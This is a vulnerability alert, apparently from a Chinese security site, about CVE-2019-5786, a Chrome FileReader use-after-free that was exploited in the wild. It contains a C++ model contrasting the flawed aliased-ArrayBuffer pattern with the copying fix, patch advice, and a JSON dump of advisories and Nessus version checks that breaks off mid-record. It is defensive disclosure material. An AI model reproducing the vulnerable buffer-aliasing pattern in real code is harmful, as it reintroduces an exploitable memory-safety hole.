CVE-2019-5786: Chrome 0day exploited in the wild, vulnerability alert - Vulnerability Alerts - 黑吧安全网 (myhack58)
2019-03-06T00:00:00
ID MYHACK58:62201993035 Type myhack58 Reporter 佚名 (anonymous) Modified 2019-03-06T00:00:00
Description
0x00 vulnerability background
On March 6 (Beijing time), 360CERT observed a Chrome stable release update (72.0.3626.119 -> 72.0.3626.121) that fixes CVE-2019-5786, a vulnerability being exploited in the wild. The vulnerability is severe and affects a large user base.
0x01 vulnerability details
CVE-2019-5786 is a use-after-free (UAF) vulnerability in FileReader, reported on 2019-02-27 by Clément Lecigne of Google's Threat Analysis Group. No further details have been released at this time.
Diffing the source of the two versions shows changes in third_party/blink/renderer/core/fileapi/file_reader_loader.cc: when a partial result is returned, the loader now copies the ArrayBuffer rather than handing out multiple references to the same underlying ArrayBuffer.
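To make the shape of that fix concrete, the following is a small C++ model written for this note; it is not Chromium's code, and the class and method names (ModelFileReaderLoader, PartialResultVulnerable, PartialResultFixed, BackingStore) are invented for the model. It contrasts a partial-result getter that hands out another reference to the loader's own growing buffer with one that returns a copy. With the first form the caller ends up holding several references to one backing store, so releasing the store through any one of them (transferring an ArrayBuffer away detaches it, for instance) invalidates every other reference, including the loader's own. The model replaces the real use-after-free with a detached flag so that it runs safely.

```cpp
// Simplified model of the CVE-2019-5786 fix pattern: return a copy of a
// still-growing buffer instead of another reference to the same storage.
// Illustrative code for this note, not Chromium's; names are invented.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <memory>
#include <vector>

// Backing store that several ArrayBuffer handles may alias. Detach() releases
// the storage, standing in for an operation that frees a buffer's memory
// through one of its references; in the real bug the other references dangle.
struct BackingStore {
  std::vector<uint8_t> bytes;
  bool detached = false;
  void Detach() {
    std::vector<uint8_t>().swap(bytes);  // actually release the storage
    detached = true;
  }
};

// Script-visible ArrayBuffer handle. Two handles may point at one store.
struct ArrayBufferHandle {
  std::shared_ptr<BackingStore> store;
  std::size_t ByteLength() const { return store->bytes.size(); }
  bool IsDetached() const { return store->detached; }
};

// Model of a loader that accumulates chunks in raw_data_ and lets the caller
// ask for the result before loading has finished (as during a progress event).
class ModelFileReaderLoader {
 public:
  // Returns false if the write would land in storage that some other
  // reference already freed: that write is the use-after-free in the real bug.
  bool Append(const std::vector<uint8_t>& chunk) {
    if (raw_data_->detached) return false;
    raw_data_->bytes.insert(raw_data_->bytes.end(), chunk.begin(), chunk.end());
    return true;
  }

  // Vulnerable shape: every call returns a new handle to the SAME store, so
  // the caller accumulates multiple references to one underlying buffer.
  ArrayBufferHandle PartialResultVulnerable() { return ArrayBufferHandle{raw_data_}; }

  // Fixed shape (what the patch does for partial results): return a copy, so
  // nothing the caller does with its handle can touch raw_data_ or other handles.
  ArrayBufferHandle PartialResultFixed() {
    auto copy = std::make_shared<BackingStore>();
    copy->bytes = raw_data_->bytes;
    return ArrayBufferHandle{copy};
  }

 private:
  std::shared_ptr<BackingStore> raw_data_ = std::make_shared<BackingStore>();
};

// True if two partial results obtained from the same loader share one store.
bool PartialResultsAlias(bool use_fix) {
  ModelFileReaderLoader loader;
  loader.Append({1, 2, 3});
  ArrayBufferHandle a = use_fix ? loader.PartialResultFixed() : loader.PartialResultVulnerable();
  ArrayBufferHandle b = use_fix ? loader.PartialResultFixed() : loader.PartialResultVulnerable();
  return a.store.get() == b.store.get();
}

// Takes two partial results, detaches through the first, then keeps loading.
// Returns true only if the second handle and the loader both stay valid.
bool RunScenario(bool use_fix) {
  ModelFileReaderLoader loader;
  loader.Append({1, 2, 3});
  ArrayBufferHandle first = use_fix ? loader.PartialResultFixed() : loader.PartialResultVulnerable();
  ArrayBufferHandle second = use_fix ? loader.PartialResultFixed() : loader.PartialResultVulnerable();
  first.store->Detach();
  bool second_still_valid = !second.IsDetached();
  bool loader_still_valid = loader.Append({4, 5});
  return second_still_valid && loader_still_valid;
}

int main() {
  std::printf("vulnerable shape: results alias=%d, survives detach=%d\n",
              PartialResultsAlias(false), RunScenario(false));
  std::printf("fixed shape:      results alias=%d, survives detach=%d\n",
              PartialResultsAlias(true), RunScenario(true));
  return 0;
}
```

The copy costs an allocation per progress event, which is why the real patch applies it only to partial results: once loading has finished the loader no longer writes to the buffer and can hand over its single final result without copying.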
0x02 safety recommendations
Chrome users should open chrome://settings/help to check the current browser version. If it is not the latest version (72.0.3626.121), Chrome checks for and downloads the update automatically; the update only takes effect after the browser is restarted. Vendors of other Chromium-based browsers should also verify that they have applied the patch.
0x03 timeline
2019-02-27 vulnerability reported
2019-03-01 Chrome 72.0.3626.121 released
2019-03-05 Google states that the vulnerability is being exploited in the wild
0x04 reference links
https://chromium.googlesource.com/chromium/src/+/150407e8d3610ff25a45c7c46877333c4425f062%5E%21/#F0
{"id": "MYHACK58:62201993035", "bulletinFamily": "info", "title": "CVE-2019-5786: chrome in the wild exploit 0day vulnerability alerts-a vulnerability alert-the black bar safety net", "description": "! [](/Article/UploadPic/2019-3/20193618498729.jpg) \n\n0x00 vulnerability background \nBeijing 3 month 6 days, 360CERT monitoring to chrome release version update(72.0.3626.119->72.0.3626.121), fixes in the wild using CVE-2019-5786\u3002 The vulnerability to harm is more serious, a greater impact. \n\n0x01 vulnerability details \nCVE-2019-5786 is located on the FileReader in the UAF vulnerability, by Google's Threat Analysis Group of the Clement Lecigne to 2019-02-27 of the report, currently not released other details. \nThe comparison of the two versions of the source code, found third_party/blink/renderer/core/fileapi/file_reader_loader. cc there are some changes. In the return part of the result copy the ArrayBuffer to avoid on the same underlying ArrayBuffer of the plurality of references. \n! [](/Article/UploadPic/2019-3/20193618498344. png) \n\n0x02 safety recommendations \nUse chrome users open chrome://settings/help page to see the current browser version, if not latest version(72.0.3626.121)will automatically check the upgrade, after the restart you can update to the latest version. Other use of the chromium core of the browser vendors also need to patch self-examination. \n! [](/Article/UploadPic/2019-3/20193618498792. 
png) \n\n0x03 timeline \n2019-02-27 vulnerability is reported \n2019-03-01 chrome 72.0.3626.121 release \n2019-03-05 google indicates that the vulnerability is in the Wild use \n\n0x04 reference links \nhttps://chromium.googlesource.com/chromium/src/+/150407e8d3610ff25a45c7c46877333c4425f062%5E%21/#F0 \n\n", "published": "2019-03-06T00:00:00", "modified": "2019-03-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://www.myhack58.com/Article/html/3/62/2019/93035.htm", "reporter": "\u4f5a\u540d", "references": [], "cvelist": ["CVE-2019-5786"], "type": "myhack58", "lastseen": "2019-03-06T15:30:17", "edition": 1, "viewCount": 87, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-5786"]}, {"type": "cve0day", "idList": ["CVE0DAY:851338C1B7DCB669BE46028279C70ED6"]}, {"type": "attackerkb", "idList": ["AKB:46AE5A4F-8BF9-4CF9-BB33-2CB591D7B62D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310875626", "OPENVAS:1361412562310852356", "OPENVAS:1361412562310814690", "OPENVAS:1361412562310814691", "OPENVAS:1361412562310704404", "OPENVAS:1361412562310814689"]}, {"type": "nodejs", "idList": ["NODEJS:824"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4404-1:0557C"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152772"]}, {"type": "exploitdb", "idList": ["EDB-ID:46812"]}, {"type": "archlinux", "idList": ["ASA-201903-1"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:A8A37CB410AA65484D44919B49A3B8BF"]}, {"type": "thn", "idList": ["THN:9B9CD91CB050B48FE5802D55125DA161", "THN:04C2B4D392A1C67EF52FAF0D2CFA9E55"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2019-0481.NASL", "GOOGLE_CHROME_72_0_3626_121.NASL", "FEDORA_2019-561EAE4626.NASL", "DEBIAN_DSA-4404.NASL", "OPENSUSE-2019-298.NASL", "MACOSX_GOOGLE_CHROME_72_0_3626_121.NASL", "GENTOO_GLSA-201903-23.NASL", "FEDORA_2019-05A780936D.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/CHROME_FILEREADER_UAF"]}, {"type": "suse", "idList": 
["OPENSUSE-SU-2019:0298-1"]}, {"type": "redhat", "idList": ["RHSA-2019:0481"]}, {"type": "kaspersky", "idList": ["KLA11436", "KLA11430"]}, {"type": "github", "idList": ["GHSA-C2GP-86P4-5935"]}, {"type": "zdt", "idList": ["1337DAY-ID-32669"]}, {"type": "krebs", "idList": ["KREBS:8CCFB0DC3A6FAC8000722BE0DCBA640E"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9"]}, {"type": "threatpost", "idList": ["THREATPOST:C63BDB5BFB4AECB9F2F95F69E238122B", "THREATPOST:0C6C1B17AFD30FEDE0604F98C6C93413"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993173"]}, {"type": "securelist", "idList": ["SECURELIST:A3CEAF1114E104F14254F7AF77D7D080"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126"]}, {"type": "gentoo", "idList": ["GLSA-201903-23"]}, {"type": "fedora", "idList": ["FEDORA:3240460C5991", "FEDORA:906EB6076D01"]}], "modified": "2019-03-06T15:30:17", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2019-03-06T15:30:17", "rev": 2}, "vulnersScore": 6.6}}
{"cve": [{"lastseen": "2020-12-09T21:41:54", "description": "Object lifetime issue in Blink in Google Chrome prior to 72.0.3626.121 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-06-27T17:15:00", "title": "CVE-2019-5786", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5786"], "modified": "2019-07-01T18:26:00", "cpe": [], "id": "CVE-2019-5786", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-5786", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": []}], "cve0day": [{"lastseen": "2019-03-07T12:53:59", "bulletinFamily": "info", "cvelist": ["CVE-2019-5786"], "description": "**Description**\n\nGoogle Chrome is prone to an arbitrary code execution vulnerability.\n\nAttackers can exploit this issue to execute arbitrary code in the context of the browser, Failed attempts will likely cause a denial-of-service condition.\n\nGoogle Chrome versions prior to 72.0.3626.121 are vulnerable.\n\n[Google Chrome 
CVE-2019-5786 Arbitrary Code Execution](<https://www.cve0day.com/google-chrome-cve-2019-5786-arbitrary-code-execution.html>)\u6700\u5148\u51fa\u73b0\u5728[CVE 0day](<https://www.cve0day.com>)\u3002", "modified": "2019-03-04T13:13:08", "published": "2019-03-04T13:13:08", "id": "CVE0DAY:851338C1B7DCB669BE46028279C70ED6", "href": "https://www.cve0day.com/google-chrome-cve-2019-5786-arbitrary-code-execution.html", "type": "cve0day", "title": "Google Chrome CVE-2019-5786 Arbitrary Code Execution", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2020-11-18T06:42:23", "bulletinFamily": "info", "cvelist": ["CVE-2019-5786"], "description": "Google Chrome is prone to a use-after-free vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the browser. Failed attempts will likely cause a denial-of-service condition.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at September 23, 2020 8:20pm UTC reported:\n\nThis was exploited in the wild as noted at <https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html> and <https://blog.exodusintel.com/2019/05/17/windows-within-windows/>\n\n**pbarry-r7** at November 25, 2019 3:26pm UTC reported:\n\nThis was exploited in the wild as noted at <https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html> and <https://blog.exodusintel.com/2019/05/17/windows-within-windows/>\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 2**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nThis was exploited in the wild as noted at <https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html> and <https://blog.exodusintel.com/2019/05/17/windows-within-windows/>\n", "modified": "2020-02-13T00:00:00", "published": "2019-06-27T00:00:00", "id": "AKB:46AE5A4F-8BF9-4CF9-BB33-2CB591D7B62D", "href": "https://attackerkb.com/topics/pLgqGAtHGG/google-chrome-cve-2019-5786-filereader-use-after-free-vulnerability", 
"type": "attackerkb", "title": "Google Chrome CVE-2019-5786 FileReader Use-After-Free Vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "malwarebytes": [{"lastseen": "2019-03-30T03:38:11", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5786"], "description": "**Update (2019-03-21)**\n\nA proof of concept for CVE-2019-5786 was [published by Exodus Intel](<https://github.com/exodusintel/CVE-2019-5786>). In our earlier post we exercised caution before claiming we would have blocked this zero-day, but we can now say with confidence that an older version of Malwarebytes (1.12.1.122) would have mitigated this attack:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/03/MBAE_Chrome_0day.png> \"\" )\n\nThis shows the benefits for certain applications from being allowed to inject into Chrome, something that Google's new policies have disabled.\n\n--\n\nIt's not often that we hear about a critical vulnerability in Google Chrome, and perhaps it's even more rare when Google's own engineers are urging users to patch.\n\nThere are several good reasons why you need to take this new Chrome zero-day ([CVE-2019-5786](<https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html>)) seriously. For starters, we are talking about a full exploitation that escapes the sandbox and leads to remote code execution. 
This in itself is not an easy feat, and is usually observed only sporadically, perhaps [during a Pwn2Own competition.](<https://www.computerworld.com/article/3186686/google-patches-chrome-bug-from-fizzled-pwn2own-hack.html>) But this time, Google is saying that this vulnerability is actively being used in the wild.\n\nAccording to [Cl\u00e9ment Lecigne](<https://twitter.com/_clem1>), the person from Google's Threat Analysis Group who discovered the attack, there is [another zero-day](<https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html?m=1>) that exists in Microsoft Windows (yet to be patched), suggesting the two could be chained up for even greater damage.\n\n\n\nProof of concept for CVE-2019-5786\n\nIf you are running Google Chrome and its version is below 72.0.3626.121, your computer could be exploited without your knowledge. While it's true that Chrome features an automatic update component, in order for the patch to be installed you must restart your browser.\n\nThis may not seem like a big deal but it is. Another Google engineer explains why this matters a lot, in comparison to past exploits:\n\n> This newest exploit is different, in that initial chain targeted Chrome code directly, and thus required the user to have restarted the browser after the update was downloaded. For most users the update download is automatic, but restart is a usually a manual action. [3/3]\n> \n> -- Justin Schuh  (@justinschuh) [March 7, 2019](<https://twitter.com/justinschuh/status/1103763266445037568?ref_src=twsrc%5Etfw>)\n\nConsidering how many users keep Chrome and all their tabs opened for days or even weeks without ever restarting the browser, the security impact is real.\n\nSome might see a bit of irony with this latest zero-day considering Google\u2019s move to [ban third-party software injections](<https://blog.chromium.org/2017/11/reducing-chrome-crashes-caused-by-third.html>). 
Many security programs, including Malwarebytes, need to hook into processes, such as the browser and common Office applications, in order to detect and block exploits from happening. However, we cannot say for sure whether or not this could prevent the vulnerability from being exploited, since few details have been shared yet.\n\nIn the meantime, if you haven't done so yet, you should [update and relaunch Chrome;](<https://support.google.com/chrome/answer/95414?co=GENIE.Platform%3DDesktop>) and don't worry about your tabs, they will come right back.\n\nThe post [Google Chrome zero-day: Now is the time to update and restart your browser](<https://blog.malwarebytes.com/cybercrime/exploits/2019/03/google-chrome-zero-day-now-is-the-time-to-update-and-restart-your-browser/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-03-08T19:13:15", "published": "2019-03-08T19:13:15", "id": "MALWAREBYTES:A8A37CB410AA65484D44919B49A3B8BF", "href": "https://blog.malwarebytes.com/cybercrime/exploits/2019/03/google-chrome-zero-day-now-is-the-time-to-update-and-restart-your-browser/", "type": "malwarebytes", "title": "Google Chrome zero-day: Now is the time to update and restart your browser", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2019-08-13T18:46:58", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5786"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 72.0.3626.121.\n\nSecurity Fix(es):\n\n* chromium-browser: Use-after-free in FileReader (CVE-2019-5786)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-03-12T00:58:04", "published": "2019-03-12T00:57:08", "id": "RHSA-2019:0481", "href": "https://access.redhat.com/errata/RHSA-2019:0481", "type": "redhat", "title": 
"(RHSA-2019:0481) Important: chromium-browser security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-01-01T01:50:12", "description": "Clement Lecigne discovered a use-after-free issue in chromium's file\nreader implementation. A maliciously crafted file could be used to\nremotely execute arbitrary code because of this problem.\n\nThis update also fixes a regression introduced in a previous update.\nThe browser would always crash when launched in remote debugging mode.", "edition": 17, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2019-03-11T00:00:00", "title": "Debian DSA-4404-1 : chromium - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4404.NASL", "href": "https://www.tenable.com/plugins/nessus/122723", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4404. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122723);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/07/05 9:53:32\");\n\n script_cve_id(\"CVE-2019-5786\");\n script_xref(name:\"DSA\", value:\"4404\");\n\n script_name(english:\"Debian DSA-4404-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Clement Lecigne discovered a use-after-free issue in chromium's file\nreader implementation. 
A maliciously crafted file could be used to\nremotely execute arbitrary code because of this problem.\n\nThis update also fixes a regression introduced in a previous update.\nThe browser would always crash when launched in remote debugging mode.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4404\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 72.0.3626.122-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/09\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"chromedriver\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-driver\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-l10n\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-shell\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-widevine\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T03:09:01", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 72.0.3626.121. 
It is, therefore, affected by a vulnerability\nas referenced in the 2019_03_stable-channel-update-for-desktop\nadvisory.\n\n - Use-after-free in FileReader. (CVE-2019-5786)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 18, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2019-03-06T00:00:00", "title": "Google Chrome < 72.0.3626.121 Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_72_0_3626_121.NASL", "href": "https://www.tenable.com/plugins/nessus/122617", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122617);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/31 15:18:51\");\n\n script_cve_id(\"CVE-2019-5786\");\n script_bugtraq_id(107213);\n\n script_name(english:\"Google Chrome < 72.0.3626.121 Vulnerability\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 72.0.3626.121. It is, therefore, affected by a vulnerability\nas referenced in the 2019_03_stable-channel-update-for-desktop\nadvisory.\n\n - Use-after-free in FileReader. 
(CVE-2019-5786)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df49025b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/936448\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 72.0.3626.121 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5786\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'72.0.3626.121', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-31T20:20:53", "description": "An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 72.0.3626.121.\n\nSecurity Fix(es) :\n\n* chromium-browser: Use-after-free in FileReader (CVE-2019-5786)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 9, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2019-03-12T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2019:0481)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "modified": "2019-03-12T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-0481.NASL", "href": "https://www.tenable.com/plugins/nessus/122771", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin 
were \n# extracted from Red Hat Security Advisory RHSA-2019:0481. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122771);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-5786\");\n script_xref(name:\"RHSA\", value:\"2019:0481\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2019:0481)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 72.0.3626.121.\n\nSecurity Fix(es) :\n\n* chromium-browser: Use-after-free in FileReader (CVE-2019-5786)\n\nFor more details about the security issue(s), including the impact, 